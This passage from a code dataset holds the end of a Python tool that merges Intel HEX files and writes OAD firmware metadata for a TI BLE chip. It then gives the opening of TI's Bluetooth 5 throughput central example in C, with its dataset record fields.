default=0xff)\n parser.add_argument('-m', '--meta', help='Override calculated location of metadata', type=auto_int)\n #parser.add_argument('-c', '--crc', help='Override generated CRC value', type=auto_int)\n parser.add_argument('-r', '--range', help='Range of addresses included in output', type=auto_range)\n #parser.add_argument('-l', '--len', help='Override calculated image length [bytes]', type=auto_int)\n parser.add_argument('-q', '--quiet', action='store_true', help='Do not produce diagnostic and informational output', default=False)\n parser.add_argument('--round', help='Round up end-address to fill nearest X, for example 4096 if sectors are 4kB. 
Ignored if end-range given', type=auto_int)\n parser.add_argument('--version', action='version', version=(parser.prog + ' ' + tool_version))\n\n #parse the user's command line arguments\n if len(sys.argv[1:]) == 0:\n parser.print_help()\n # parser.print_usage() # for just the usage line\n parser.exit()\n\n vargs = parser.parse_args()\n\n if vargs.out is None and vargs.outbin is None:\n print(\">> Missing output file(s)\\n\")\n parser.print_usage()\n parser.exit()\n\n # Determine if normal output should be presented\n if vargs.quiet or (vargs.hexfile and vargs.hexfile[0] is sys.stdin) or (vargs.out and vargs.out is sys.stdout) or (vargs.outbin and vargs.outbin is sys.stdout):\n oldPrint = __builtin__.print\n def myprint(*args, **kwargs):\n pass\n __builtin__.print = myprint\n\n # first, print a neat header\n print_console_header()\n\n # Parse and merge hex files\n #iterate over input hexfiles, intelhexify them\n #if we cannot merge or open the hex files, the script is hosed, print and abort\n ihs = []\n inputFileNames = []\n mergedHex = IntelHex()\n\n for f in vargs.hexfile:\n try:\n ih = IntelHex(f)\n inputFileNames.append(f.name)\n ihs.append(ih)\n try:\n mergedHex.merge(ih, overlap='replace')\n except:\n print(\"Fatal Error: -- FAILED merge due to overlap when merging \" + f.name)\n sys.exit(1)\n except:\n print(\"Fatal Error: -- FAILED parsing input hex file(s)\")\n sys.exit(1)\n\n #print information about the input hex files\n print_args_info(inputFileNames, vargs.out, vargs.outbin, vargs.oadtype, vargs.imgtype, mergedHex)\n\n #Now that we have a merged hex image, lets do a bunch of arg checking\n #since mergedHex is an merge of all input hexes, it can be treated as an argument to the script\n argument_sanity_check(vargs, mergedHex)\n\n\n # Cut off / fill with --fill.\n startAddr = mergedHex.minaddr()\n endAddr = mergedHex.addresses()[-1] + 1 # Inclusive address\n\n if startAddr % OAD_BLOCK_SIZE:\n print(\"Fatal Error: -- Start address 0x%X is not divisible by 16. Exiting\")\n sys.exit(1)\n\n # DevMon rounds up to nearest sector. Why not, if they want to waste time and space.\n if vargs.round is not None:\n endAddr = ((endAddr + INT_FL_PG_SIZE) & ~(INT_FL_PG_SIZE-1))\n print ('endAddr round', hex(endAddr))\n\n if vargs.range is not None:\n if vargs.range[0] is not None: startAddr = vargs.range[0]\n if vargs.range[1] is not None: endAddr = vargs.range[1]\n\n # Make sure the last address is divisible by 16\n remainder = endAddr % OAD_BLOCK_SIZE\n if remainder:\n print(\"Last address was 0x%0X. 
Expanded to 0x%0X to be divisible by OAD block size\" % (endAddr, endAddr+(OAD_BLOCK_SIZE-remainder)) )\n endAddr += OAD_BLOCK_SIZE - remainder\n\n #if specified, the script will pad the image with the pad value\n fillHex = IntelHex()\n fillHex.puts(startAddr, struct.pack('B', vargs.fill) * (endAddr - startAddr))\n mergedHex.merge(fillHex, 'ignore')\n mergedHex = mergedHex[startAddr:endAddr] # endAddr is not inclusive in the slice\n mergedHex.padding = vargs.fill\n\n\n #if we are calculating metadata\n #Offchip OAD production images and NP images don't have embedded metadata headers, skip metadata calc for these\n #All onchip OAD images need metadata placement\n if not(vargs.oadtype == 'offchip' and (vargs.imgtype == 'production' or vargs.imgtype == 'np')):\n # Place metadata, onchip production image expects header at 0x600\n if vargs.oadtype == 'onchip' and vargs.imgtype == 'production':\n residentHdr = OadHdr._make(struct.unpack(OAD_HDR_FMT, mergedHex.tobinstr(INT_FL_OAD_IMG_A_META_BEGIN, INT_FL_OAD_IMG_A_META_BEGIN+15)))\n else:\n residentHdr = OadHdr._make(struct.unpack(OAD_HDR_FMT, mergedHex.tobinstr(startAddr, startAddr+15)))\n metaAddr = vargs.meta\n if metaAddr is None:\n # Try first address, ideally there should be free space at the beginning of the image\n #in the reserved image metadata sector\n #if onchip production image, we must start at imgA start, which is 0x600\n if vargs.oadtype == 'onchip' and vargs.imgtype == 'production':\n attemptedMetaStart = INT_FL_OAD_IMG_A_META_BEGIN\n else:\n attemptedMetaStart = mergedHex.minaddr()\n\n beginning = mergedHex.gets(attemptedMetaStart, OAD_METADATA_SIZE)\n\n\n blank16 = struct.pack('B', 0xff)*OAD_METADATA_SIZE\n if beginning == blank16:\n metaAddr = attemptedMetaStart\n print (\"Found free area at start of address range, metalocation: 0x%08X\" % metaAddr)\n\n else:\n # there are two cases to be checked by this else:\n # 1.Is there already metadata embedded in the image\n # - we verify this by checking if imgLen <= actual size and if crc == crc\n # 2.There is no metadata in the image, and no metadata addr is specified\n # - We will look to see if there is room for metadata based on start addr\n # - remember that for the current OAD solution metadata must reside\n # - in one of two places defined by EXT_FL_OAD_META_BEGIN, INT_FL_OAD_META_BEGIN\n\n #first let's assume the first 16B are metadata and see if that proves correct\n if vargs.oadtype == 'onchip' and vargs.imgtype == 'production':\n hexHdr = OadHdr._make(struct.unpack(OAD_HDR_FMT, mergedHex.tobinstr(INT_FL_OAD_IMG_A_META_BEGIN, INT_FL_OAD_IMG_A_META_BEGIN+15)))\n else:\n hexHdr = OadHdr._make(struct.unpack(OAD_HDR_FMT, mergedHex.tobinstr(startAddr, startAddr+15)))\n\n if vargs.oadtype == 'onchip' and vargs.imgtype == 'production':\n crcBin = mergedHex.tobinstr(INT_FL_OAD_IMG_A_META_BEGIN+4, INT_FL_OAD_IMG_A_END-1)\n localLen = int(math.ceil((INT_FL_OAD_IMG_A_END - INT_FL_OAD_IMG_A_META_BEGIN) / 4.0))\n else:\n crcBin = mergedHex.tobinstr(startAddr+4, endAddr-1)\n localLen = int(math.ceil((mergedHex.maxaddr() - mergedHex.minaddr()) / 4.0))\n\n\n localCrc = crc16(crcBin)\n #if the resident header checks out, then we will assume metaAddr==startAddr\n #note that the script will still over-write what is currently there\n if localCrc == hexHdr.crc and hexHdr.crcShdw == 0xFFFF and hexHdr.imgLen <= localLen:\n metaAddr = startAddr\n print(\"Resident metadata detected, using metaAddr = startAddr (0x%08X)\" % startAddr)\n print(\"Note: Resident metadata will still be overwritten\")\n else:\n # See if 
the range leaves room\n if vargs.range is None or vargs.range[0] is None:\n # First address was not specified, expand backwards\n if vargs.oadtype == 'onchip' and vargs.imgtype == 'production':\n #TODO, remember imgA start and try to start with 16B offset from here, until then assume it is here\n metaAddr = INT_FL_OAD_IMG_A_META_BEGIN\n startAddr = INT_FL_OAD_IMG_A_META_BEGIN\n else:\n metaAddr = startAddr - 0x10\n startAddr = metaAddr\n if addr_is_in_oad_imgspace(metaAddr):\n print(\"Expanded address range. Placed metadata at 0x%08X\" % metaAddr)\n else:\n print(\"Fatal Error: -- Could not find free area for metadata before 0x%08X. Exiting.\" % startAddr)\n sys.exit(1)\n else:\n #user pinned the start address via --range, so we cannot expand backwards to make room\n print(\"Fatal Error: -- Could not find free area for metadata in --range specified to start at 0x%08X. Exiting.\" % vargs.range[0])\n sys.exit(1)\n else:\n # User provided metadata location\n # Given current OAD method there is a fixed location for metadata given the OAD method (on or off chip)\n if vargs.oadtype == 'onchip' and vargs.imgtype == 'production':\n imgStartAddr = INT_FL_OAD_IMG_A_META_BEGIN\n else:\n imgStartAddr = startAddr\n\n if metaAddr > imgStartAddr or not addr_is_in_oad_imgspace(metaAddr):\n print(\"Fatal Error: -- Metadata location 0x%08X must be at the start of the image and within APP+STACK bounds. Exiting.\" % metaAddr)\n sys.exit(1)\n else:\n # Trust the user\n print(\"Placing metadata at 0x%08X\" % metaAddr)\n startAddr = metaAddr\n\n # Calculate metadata\n if vargs.oadtype == 'onchip' and vargs.imgtype == 'production':\n imgLen = int(math.ceil((INT_FL_OAD_IMG_A_END - INT_FL_OAD_IMG_A_META_BEGIN) / 4.0)) # Image length in words\n imgVer = 0 << 1 # LSB means A/B .... TODO\n elif vargs.oadtype == 'onchip':\n imgLen = int(math.ceil((endAddr - startAddr) / 4.0)) # Image length in words\n imgVer = 1 # LSB means A/B .... TODO\n else:\n imgLen = int(math.ceil((endAddr - startAddr) / 4.0)) # Image length in words\n imgVer = vargs.imgVer # LSB means A/B .... 
TODO\n\n\n usrId = vargs.usrId\n imgAddr = startAddr / 4 # In words\n imgType = imgTypes[vargs.imgtype]\n crcShdw = 0xffff\n\n meta = struct.pack('HHHH4sHBB', crcShdw, crcShdw, imgVer, imgLen, usrId, imgAddr, imgType, META_STATUS_SUCCESS)\n mergedHex.puts(metaAddr, meta)\n #production image only calculates over imgA region\n if vargs.oadtype == 'onchip' and vargs.imgtype == 'production':\n asBin = mergedHex.tobinstr(INT_FL_OAD_IMG_A_META_BEGIN, INT_FL_OAD_IMG_A_END)\n else:\n asBin = mergedHex.tobinstr(startAddr, endAddr-1)\n crc = crc16(asBin[4:])\n mergedHex.puts(metaAddr, struct.pack('H', crc))\n\n metaVector = OadHdr._make([crc, crcShdw, imgVer, imgLen, usrId, imgAddr, imgType, META_STATUS_SUCCESS])\n\n print_metadata(metaVector)\n\n\n if vargs.out and not (vargs.out is sys.stdout and vargs.outbin is sys.stdout):\n print(\"Writing to:\\n\", vargs.out.name)\n try:\n mergedHex.write_hex_file(vargs.out)\n vargs.out.flush()\n except IOError as e:\n if vargs.out is sys.stdout: pass\n else: raise e\n\n # Output binary\n if vargs.outbin is not None:\n print(\"Writing to:\\n\", vargs.outbin.name)\n try:\n vargs.outbin.write(mergedHex.tobinstr(startAddr, endAddr-1))\n vargs.outbin.flush()\n except IOError as e:\n if vargs.outbin is sys.stdout: pass\n else: raise e\n\n\n print(\"******************************************************************************************\")\n print(\"Success\")\n print(\"******************************************************************************************\")\n\n # Clean up pipes, silently ignore broken pipe\n try:\n sys.stdout.close()\n except IOError:\n pass\n\n try:\n sys.stderr.close()\n except IOError:\n pass"
},
{
"alpha_fraction": 0.5896576642990112,
"alphanum_fraction": 0.5991590619087219,
"avg_line_length": 29.023361206054688,
"blob_id": "d475cdf945077ad8b5ff220f144ac2149656a185",
"content_id": "70094ce04ded41c3f91b4f7adab47e28bb50d9cb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 66832,
"license_type": "no_license",
"max_line_length": 142,
"num_lines": 2226,
"path": "/examples/rtos/CC2640R2_LAUNCHXL/ble5apps/throughput_central/src/app/throughput_central.c",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "/******************************************************************************\n\n @file throughput_central.c\n\n @brief This file contains the Throughput Central sample application for use\n with the CC2650 Bluetooth Low Energy Protocol Stack.\n\n Group: CMCU, SCS\n Target Device: CC2640R2\n\n ******************************************************************************\n\n Copyright (c) 2013-2017, Texas Instruments Incorporated\n All rights reserved.\n\n Redistribution and use in source and binary forms, with or without\n modification, are permitted provided that the following conditions\n are met:\n\n * Redistributions of source code must retain the above copyright\n notice, this list of conditions and the following disclaimer.\n\n * Redistributions in binary form must reproduce the above copyright\n notice, this list of conditions and the following disclaimer in the\n documentation and/or other materials provided with the distribution.\n\n * Neither the name of Texas Instruments Incorporated nor the names of\n its contributors may be used to endorse or promote products derived\n from this software without specific prior written permission.\n\n THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR\n CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;\n OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR\n OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,\n EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n*****************************************************************************/\n\n/*********************************************************************\n * INCLUDES\n */\n#include <string.h>\n\n#include <ti/sysbios/knl/Task.h>\n#include <ti/sysbios/knl/Clock.h>\n#include <ti/sysbios/knl/Event.h>\n#include <ti/sysbios/knl/Queue.h>\n#include <ti/sysbios/hal/Hwi.h>\n\n#include <ti/display/Display.h>\n\n#include \"bcomdef.h\"\n\n#include <icall.h>\n#include \"util.h\"\n/* This Header file contains all BLE API and icall structure definition */\n#include \"icall_ble_api.h\"\n\n#include \"central.h\"\n\n#include \"board_key.h\"\n#include <menu/two_btn_menu.h>\n\n#include \"throughput_central_menu.h\"\n#include \"throughput_service.h\"\n\n#include \"board.h\"\n\n#include \"throughput_central.h\"\n\n#include \"ble_user_config.h\"\n\n/*********************************************************************\n * MACROS\n */\n\n/*********************************************************************\n * CONSTANTS\n */\n\n// These Constants are for Application Queue Events\n// These Events contain information on the Queue and need to be processed\n#define SBC_STATE_CHANGE_EVT 0x0001\n#define SBC_KEY_CHANGE_EVT 0x0002\n#define SBC_RSSI_READ_EVT 0x0004\n#define SBC_PDU_UPDATE_EVT 0x0008\n#define SBC_PHY_UPDATE_EVT 0x0010\n#define SBC_MEASURE_INST_SPEED_EVT 0x0020\n\n// Simple BLE Central Task Events - often containing no information to process\n// other than the event itself\n#define SBC_ICALL_EVT ICALL_MSG_EVENT_ID // Event_Id_31\n#define SBC_QUEUE_EVT UTIL_QUEUE_EVENT_ID // 
Event_Id_30\n#define SBC_START_DISCOVERY_EVT Event_Id_00\n#define SBC_MEASURE_AVG_SPEED_EVT Event_Id_01\n#define SBC_TOGGLE_THROUGHPUT_EVT Event_Id_02\n\n#define SBC_ALL_EVENTS (SBC_ICALL_EVT | \\\n SBC_QUEUE_EVT | \\\n SBC_START_DISCOVERY_EVT | \\\n SBC_MEASURE_AVG_SPEED_EVT | \\\n SBC_TOGGLE_THROUGHPUT_EVT)\n\n// Maximum number of scan responses\n#define DEFAULT_MAX_SCAN_RES 8\n\n// Scan duration in ms\n#define DEFAULT_SCAN_DURATION 4000\n\n// Discovery mode (limited, general, all)\n#define DEFAULT_DISCOVERY_MODE DEVDISC_MODE_ALL\n\n// TRUE to use active scan\n#define DEFAULT_DISCOVERY_ACTIVE_SCAN TRUE\n\n// TRUE to use white list during discovery\n#define DEFAULT_DISCOVERY_WHITE_LIST FALSE\n\n// TRUE to use high scan duty cycle when creating link\n#define DEFAULT_LINK_HIGH_DUTY_CYCLE FALSE\n\n// TRUE to use white list when creating link\n#define DEFAULT_LINK_WHITE_LIST FALSE\n\n// Default RSSI polling period in ms\n#define DEFAULT_RSSI_PERIOD 4000\n\n// Whether to enable automatic parameter update request when a connection is\n// formed\n#define DEFAULT_ENABLE_UPDATE_REQUEST GAPCENTRALROLE_PARAM_UPDATE_REQ_AUTO_ACCEPT\n\n// Minimum connection interval (units of 1.25ms) if automatic parameter update\n// request is enabled\n#define DEFAULT_UPDATE_MIN_CONN_INTERVAL 400\n\n// Maximum connection interval (units of 1.25ms) if automatic parameter update\n// request is enabled\n#define DEFAULT_UPDATE_MAX_CONN_INTERVAL 800\n\n// Slave latency to use if automatic parameter update request is enabled\n#define DEFAULT_UPDATE_SLAVE_LATENCY 0\n\n// Supervision timeout value (units of 10ms) if automatic parameter update\n// request is enabled\n#define DEFAULT_UPDATE_CONN_TIMEOUT 100\n\n// Default service discovery timer delay in ms\n#define DEFAULT_SVC_DISCOVERY_DELAY 3000\n\n#define CODED_PHY_CHANGE_DELAY 500\n\n// Type of Display to open\n#if defined(BOARD_DISPLAY_USE_LCD) && (BOARD_DISPLAY_USE_LCD!=0)\n #define SBC_DISPLAY_TYPE Display_Type_LCD\n#elif defined (BOARD_DISPLAY_USE_UART) && (BOARD_DISPLAY_USE_UART!=0)\n #define SBC_DISPLAY_TYPE Display_Type_UART\n#else // !BOARD_DISPLAY_USE_LCD && !BOARD_DISPLAY_USE_UART\n #define SBC_DISPLAY_TYPE 0 // Option not supported\n#endif // BOARD_DISPLAY_USE_LCD && BOARD_DISPLAY_USE_UART\n\n// Row numbers\n#define SBC_ROW_RESULT TBM_ROW_APP\n#define SBC_ROW_STATUS_1 (TBM_ROW_APP + 1)\n#define SBC_ROW_STATUS_2 (TBM_ROW_APP + 2)\n#define SBC_ROW_PEER_DEVICE (TBM_ROW_APP + 2)\n#define SBC_ROW_STATUS_3 (TBM_ROW_APP + 3)\n#define SBC_ROW_PHY (TBM_ROW_APP + 3)\n#define SBC_ROW_STATUS_4 (TBM_ROW_APP + 4)\n#define SBC_ROW_INST_THROUGHPUT (TBM_ROW_APP + 4)\n#define SBC_ROW_AVG_THROUGHPUT (TBM_ROW_APP + 5)\n#define SBC_ROW_RSSI (TBM_ROW_APP + 6)\n#define SBC_ROW_BDADDR (TBM_ROW_APP + 8)\n#define SBC_ROW_ROLESTATE (TBM_ROW_APP + 9)\n//#define SBC_ROW_GATT_RESULT (TBM_ROW_APP + 10)\n#define SBC_ROW_PDU (TBM_ROW_APP + 10)\n#define SBC_ROW_MTU (TBM_ROW_APP + 11)\n\n// Task configuration\n#define SBC_TASK_PRIORITY 1\n\n#ifndef SBC_TASK_STACK_SIZE\n#define SBC_TASK_STACK_SIZE 864\n#endif\n#define DLE_MAX_PDU_SIZE 251\n#define DLE_MAX_TX_TIME 17040\n\n#define DEFAULT_PDU_SIZE 27\n#define DEFAULT_TX_TIME 328\n\n// Application states\nenum\n{\n BLE_STATE_IDLE,\n BLE_STATE_CONNECTING,\n BLE_STATE_CONNECTED,\n BLE_STATE_DISCONNECTING\n};\n\n// Discovery states\nenum\n{\n BLE_DISC_STATE_IDLE, // Idle\n BLE_DISC_STATE_MTU, // Exchange ATT MTU size\n BLE_DISC_STATE_SVC, // Service discovery\n BLE_DISC_STATE_CHAR // Characteristic 
discovery\n};\n\n/*********************************************************************\n * TYPEDEFS\n */\n\n// App event passed from profiles.\ntypedef struct\n{\n appEvtHdr_t hdr; // event header\n uint8_t *pData; // event data\n} sbcEvt_t;\n\n// RSSI read data structure\ntypedef struct\n{\n uint16_t period; // how often to read RSSI\n uint16_t connHandle; // connection handle\n Clock_Struct *pClock; // pointer to clock struct\n} readRssi_t;\n\n// A struct to contain scan response data we're interested in\n// Nameless struct typedefed to scanResultDeviceRecord_t\ntypedef struct\n{\n uint8 addrType; //!< Address Type: @ref GAP_Addr_Types\n uint8 addr[B_ADDR_LEN]; //!< Device's Address\n uint8 advertLen; //!< Length of Advertisement Data\n uint8* advertData; //!< Pointer Adv Data\n uint8 scanLen; //!< Length of Scan Response Data\n uint8* scanRsp; //!< Pointer Scan Response\n} scanResultDeviceRecord_t;\n\ntypedef struct\n{\n uint16_t charHdl; //!< Characteristic Handle\n uint8 addr[ATT_UUID_SIZE]; //!< UUID of characteristic\n} throughputProfileHdl_t;\n\n/*********************************************************************\n * GLOBAL VARIABLES\n */\n\n// Display Interface\nDisplay_Handle dispHandle = NULL;\n\n/*********************************************************************\n * EXTERNAL VARIABLES\n */\n\n/*********************************************************************\n * LOCAL VARIABLES\n */\n\n// Entity ID globally used to check for source and/or destination of messages\nstatic ICall_EntityID selfEntity;\n\n// Event globally used to post local events and pend on system and\n// local events.\nstatic ICall_SyncHandle syncEvent;\n\n// Clock object used to signal timeout\nstatic Clock_Struct startDiscClock;\nstatic Clock_Struct speedClock;\nstatic Clock_Struct startPHYClock;\n\n// Queue object used for app messages\nstatic Queue_Struct appMsg;\nstatic Queue_Handle appMsgQueue;\n\n// Task configuration\nTask_Struct sbcTask;\nChar sbcTaskStack[SBC_TASK_STACK_SIZE];\n\n// GAP GATT Attributes\nstatic const uint8_t attDeviceName[GAP_DEVICE_NAME_LEN] = \"BLE5 Central\";\n\n// Number of scan results and scan result index\nstatic uint8_t scanRes = 0;\nstatic int8_t scanIdx = -1;\n\n// Scan result list\nstatic scanResultDeviceRecord_t devList[DEFAULT_MAX_SCAN_RES];\n\n// Connection handle of current connection\nstatic uint16_t connHandle = GAP_CONNHANDLE_INIT;\n\n// Application state\nstatic uint8_t state = BLE_STATE_IDLE;\n\n// Discovery state\nstatic uint8_t discState = BLE_DISC_STATE_IDLE;\n\n// Discovered service start and end handle\nstatic uint16_t svcStartHdl = 0;\nstatic uint16_t svcEndHdl = 0;\n\n// Maximum PDU size (default = 27 octets)\nstatic uint16 maxPduSize;\n\n// Array of RSSI read structures\nstatic readRssi_t readRssi[MAX_NUM_BLE_CONNS];\n\n// Search String for Throughput Periphereal\nstatic const char searchStr[] = {\n 0x12, // length of this data\n GAP_ADTYPE_LOCAL_NAME_COMPLETE,\n 'T',\n 'h',\n 'r',\n 'o',\n 'u',\n 'g',\n 'h',\n 'p',\n 'u',\n 't',\n ' ',\n 'P',\n 'e',\n 'r',\n 'i',\n 'p',\n 'h',\n};\n\n// Received byte counters + circular buffer for Throughput Data\nstatic volatile uint32_t bytesRecvd = 0;\n#define CB_SIZE 10\nstatic uint32_t bytesRecvd_cb[CB_SIZE];\nstatic int bytesRecvd_cb_index = 0;\nstatic bool cbBufferFilled = false;\n\n// Strings for PHY\nstatic uint8_t* phyName[] = {\n \"1 Mbps\", \"2 Mbps\",\n \"Coded:S2\", \"Coded:S8\",\n \"Coded\"\n};\n\n// PHY Index\nstatic uint8_t phyIndex = 0;\nstatic bool phyConfirm = true;\n\n// Pointer to requested PHY 
index\nstatic uint8_t* phyClock_phyIndex= 0;\n\n// PHY Options\nstatic uint16_t phyOptions = HCI_PHY_OPT_NONE;\n\nstatic throughputProfileHdl_t* throughputHandles = NULL;\n\n// Global Variables for GUI Composer\nuint16_t currentPeerTxPDUSize = 0;\nuint8_t currentPHY1M = 1;\nuint8_t currentPHY2M = 0;\nuint32_t instantRate = 0;\nuint32_t averageRate = 0;\nuint8_t currentMTUSize = 0;\n\n/*********************************************************************\n * LOCAL FUNCTIONS\n */\nstatic void SimpleBLECentral_init(void);\nstatic void SimpleBLECentral_taskFxn(UArg a0, UArg a1);\n\nstatic void SimpleBLECentral_processGATTMsg(gattMsgEvent_t *pMsg);\nstatic void SimpleBLECentral_handleKeys(uint8_t shift, uint8_t keys);\nstatic void SimpleBLECentral_processStackMsg(ICall_Hdr *pMsg);\nstatic void SimpleBLECentral_processAppMsg(sbcEvt_t *pMsg);\nstatic void SimpleBLECentral_processRoleEvent(gapCentralRoleEvent_t *pEvent);\nstatic void SimpleBLECentral_processGATTDiscEvent(gattMsgEvent_t *pMsg);\nstatic void SimpleBLECentral_startDiscovery(void);\nstatic void SimpleBLECentral_addDeviceInfo(uint8_t *pAddr, uint8_t addrType, uint8_t dataType, uint8_t dataLen, uint8_t* data);\n\nstatic void SimpleBLECentral_processCmdCompleteEvt(hciEvt_CmdComplete_t *pMsg);\nstatic bStatus_t SimpleBLECentral_StartRssi(uint16_t connHandle, uint16_t period);\nstatic bStatus_t SimpleBLECentral_CancelRssi(uint16_t connHandle);\nstatic readRssi_t *SimpleBLECentral_RssiAlloc(uint16_t connHandle);\nstatic readRssi_t *SimpleBLECentral_RssiFind(uint16_t connHandle);\nstatic void SimpleBLECentral_RssiFree(uint16_t connHandle);\n\nstatic uint8_t SimpleBLECentral_eventCB(gapCentralRoleEvent_t *pEvent);\n\nvoid SimpleBLECentral_speedHandler(UArg a0);\nvoid SimpleBLECentral_PHYHandler(UArg a0);\nvoid SimpleBLECentral_startDiscHandler(UArg a0);\nvoid SimpleBLECentral_keyChangeHandler(uint8 keys);\nvoid SimpleBLECentral_readRssiHandler(UArg a0);\n\nstatic uint8_t SimpleBLECentral_enqueueMsg(uint8_t event, uint8_t status,\n void *pData);\n\nstatic void SBC_ClearDeviceList();\nstatic void SBC_NextDevice();\nstatic void SBC_ConnectToDevice();\n\n/*********************************************************************\n * EXTERN FUNCTIONS\n */\nextern void AssertHandler(uint8 assertCause, uint8 assertSubcause);\n\n/*********************************************************************\n * PROFILE CALLBACKS\n */\n\n// GAP Role Callbacks\nstatic gapCentralRoleCB_t SimpleBLECentral_roleCB =\n{\n SimpleBLECentral_eventCB // Event callback\n};\n\n/*********************************************************************\n * PUBLIC FUNCTIONS\n */\n\n/*********************************************************************\n * @fn SimpleBLEPeripheral_createTask\n *\n * @brief Task creation function for the Simple BLE Peripheral.\n *\n * @param none\n *\n * @return none\n */\nvoid SimpleBLECentral_createTask(void)\n{\n Task_Params taskParams;\n\n // Configure task\n Task_Params_init(&taskParams);\n taskParams.stack = sbcTaskStack;\n taskParams.stackSize = SBC_TASK_STACK_SIZE;\n taskParams.priority = SBC_TASK_PRIORITY;\n\n Task_construct(&sbcTask, SimpleBLECentral_taskFxn, &taskParams, NULL);\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_Init\n *\n * @brief Initialization function for the Simple BLE Central App Task.\n * This is called during initialization and should contain\n * any application specific initialization (ie. 
hardware\n * initialization/setup, table initialization, power up\n * notification).\n *\n * @param none\n *\n * @return none\n */\nstatic void SimpleBLECentral_init(void)\n{\n uint8_t i;\n\n // ******************************************************************\n // N0 STACK API CALLS CAN OCCUR BEFORE THIS CALL TO ICall_registerApp\n // ******************************************************************\n // Register the current thread as an ICall dispatcher application\n // so that the application can send and receive messages.\n ICall_registerApp(&selfEntity, &syncEvent);\n\n // Create an RTOS queue for message from profile to be sent to app.\n appMsgQueue = Util_constructQueue(&appMsg);\n\n // Setup discovery delay as a one-shot timer\n Util_constructClock(&startDiscClock, SimpleBLECentral_startDiscHandler,\n DEFAULT_SVC_DISCOVERY_DELAY, 0, false, NULL);\n\n // Setup throughput clock to run every second\n Util_constructClock(&speedClock, SimpleBLECentral_speedHandler,\n 1000, 1000, false, NULL);\n\n // Set up a PHY Clock for transitions between Coded PHYs\n Util_constructClock(&startPHYClock, SimpleBLECentral_PHYHandler,\n 0, 0, false, 0);\n\n Board_initKeys(SimpleBLECentral_keyChangeHandler);\n\n // Open Display.\n dispHandle = Display_open(SBC_DISPLAY_TYPE, NULL);\n\n // Initialize internal data\n for (i = 0; i < MAX_NUM_BLE_CONNS; i++)\n {\n readRssi[i].connHandle = GAP_CONNHANDLE_ALL;\n readRssi[i].pClock = NULL;\n }\n\n // Setup Central Profile\n {\n uint8_t scanRes = DEFAULT_MAX_SCAN_RES;\n\n GAPCentralRole_SetParameter(GAPCENTRALROLE_MAX_SCAN_RES, sizeof(uint8_t),\n &scanRes);\n }\n\n // Setup GAP\n GAP_SetParamValue(TGAP_GEN_DISC_SCAN, DEFAULT_SCAN_DURATION);\n GAP_SetParamValue(TGAP_LIM_DISC_SCAN, DEFAULT_SCAN_DURATION);\n GGS_SetParameter(GGS_DEVICE_NAME_ATT, GAP_DEVICE_NAME_LEN,\n (void *)attDeviceName);\n\n // Initialize GATT Client\n VOID GATT_InitClient();\n\n // Register to receive incoming ATT Indications/Notifications\n GATT_RegisterForInd(selfEntity);\n\n // Initialize GATT attributes\n GGS_AddService(GATT_ALL_SERVICES); // GAP\n GATTServApp_AddService(GATT_ALL_SERVICES); // GATT attributes\n\n // Start the Device\n VOID GAPCentralRole_StartDevice(&SimpleBLECentral_roleCB);\n\n // Register with GAP for HCI/Host messages (for RSSI)\n GAP_RegisterForMsgs(selfEntity);\n\n // Register for GATT local events and ATT Responses pending for transmission\n GATT_RegisterForMsgs(selfEntity);\n\n /*\n * TBM stuff\n */\n\n // Set the title of the main menu\n TBM_SET_TITLE(&sbcMenuMain, \"Texas Instruments Bluetooth 5 Demo\");\n\n // Initialize Two-Button Menu module\n // Enable Scanning and connecting only\n tbm_setItemStatus(&sbcMenuMain, TBM_ITEM_0, TBM_ITEM_1 | TBM_ITEM_2 | TBM_ITEM_3 | TBM_ITEM_4);\n // Only Allow Scanning\n tbm_setItemStatus(&sbcMenuScanandConnect, TBM_ITEM_ALL, TBM_ITEM_0 | TBM_ITEM_1);\n tbm_initTwoBtnMenu(dispHandle, &sbcMenuMain, 4, NULL);\n\n // Get Current Data Length\n HCI_LE_ReadMaxDataLenCmd();\n\n // By Default Allow Central to support any and all PHYs\n HCI_LE_SetDefaultPhyCmd(LL_PHY_USE_ANY_PHY, LL_PHY_1_MBPS | LL_PHY_2_MBPS| HCI_PHY_CODED, LL_PHY_1_MBPS | LL_PHY_2_MBPS| HCI_PHY_CODED);\n\n // Set the Transmit Power of the Device to +5dBm\n HCI_EXT_SetTxPowerCmd(HCI_EXT_TX_POWER_5_DBM);\n\n // Set the RX Gain to be highest\n HCI_EXT_SetRxGainCmd(HCI_EXT_RX_GAIN_HIGH);\n\n // Display Default MTU Size (updated during MTU exchange)\n Display_print1(dispHandle, SBC_ROW_MTU, 0, \"MTU Size: %dB\", 
